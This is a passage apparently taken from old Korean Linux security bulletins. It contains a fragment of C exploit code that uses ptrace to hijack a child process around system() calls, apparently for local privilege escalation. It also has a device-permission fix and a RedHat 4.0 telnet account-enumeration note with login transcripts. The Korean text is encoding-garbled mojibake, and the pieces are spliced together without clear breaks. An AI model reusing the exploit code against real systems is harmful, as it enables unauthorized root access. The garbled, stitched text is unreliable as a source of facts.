/* Send the parent a signal, so it starts tracing */
kill(getppid(), SIGUSR1);
/* A loop since the parent may not start tracing immediately */
while (1) system("");
}
/* Wait until the child tells us the next library call will be
system() */
while (!started);
if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");
/* Single step the child until it gets out of system() */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));
/* Single step the child until it calls system() again */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));
/* Kill the child, we don't need it any more */
if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");
pid = 0;
ÇØ°áÃ¥
ÀÌ µð¹ÙÀ̽ºÀÇ Æ۹̼ÇÀ» ÀÏ¹Ý À‾Àú°¡ Àб⸸ °¡´ÉÇϵµÏ Çضó
ÀÏ¹Ý À‾Àú°¡ ¾²±â¸¦ ÇÒ ¼ö ¾øµµÏ Çضó
chmod 664 /dev/psaux
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º telnet (1)
¸íÉ
telnet
½Ã½ºÅÛ
RedHat 4.0
¹®Á¦Á¡
¿øÇϴ ȣ½ºÆ®¿¡ ¾î¶² °èÁ¤ÀÌ ÀÖ´ÂÁö ¾ø´ÂÁö¸¦ È®ÀÎ ÇÒ ¼ö ÀÖ´Ù.
¿¹¸¦ µé¾î.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Red Hat Linux release 4.0 (Colgate)
Kernel 2.0.24 on an i586
login: bug
Password:
Login incorrect
Connection closed by foreign host.
¾ø´Â °èÁ¤À» ÀÔ½ÿ¡ Çѹø¿¡ ³¡³´Ù.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Red Hat Linux release 4.0 (Colgate)
Kernel 2.0.24 on an i586
login: root
Password:
Login incorrect
login:
login:
login:
login:
°èÁ¤ÀÌ ÀÖÀ» °æ¿ì °è¼Ó ¹°¾î º»´Ù.
---------------------------